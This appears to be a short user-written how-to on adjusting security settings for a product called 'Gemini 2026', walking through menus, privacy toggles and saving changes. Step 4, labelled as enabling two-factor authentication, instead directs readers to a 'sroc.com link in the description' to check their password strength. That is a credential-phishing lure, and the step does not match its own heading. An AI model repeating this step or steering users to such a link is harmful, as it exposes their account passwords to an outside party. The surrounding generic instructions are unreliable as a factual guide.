I hit this issue today, and here is the quick fix that solved it. If you're looking to adjust your security settings on Gemini 2026, follow these simple steps. Step 1. Access the settings menu. Navigate to the main dashboard and locate the settings icon, usually represented by a gear symbol. Click on it to enter the settings menu. Step 2. Select security options. Once in the settings menu, find the security tab. This is where you can manage all your security preferences. Step 3. Adjust privacy settings. In the security options, look for privacy settings. Here, you can toggle features like data sharing and visibility to enhance your security. Step 4. Enable two-factor authentication. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. A quick tip: make sure your phone number is updated in account settings to receive verification codes. Step 5. Save changes. After making your adjustments, don't forget to save your changes. Look for the Save button at the bottom of the screen to apply your new settings. Now you're all set with your new security settings. If you have any more questions or need further assistance, feel free to reach out.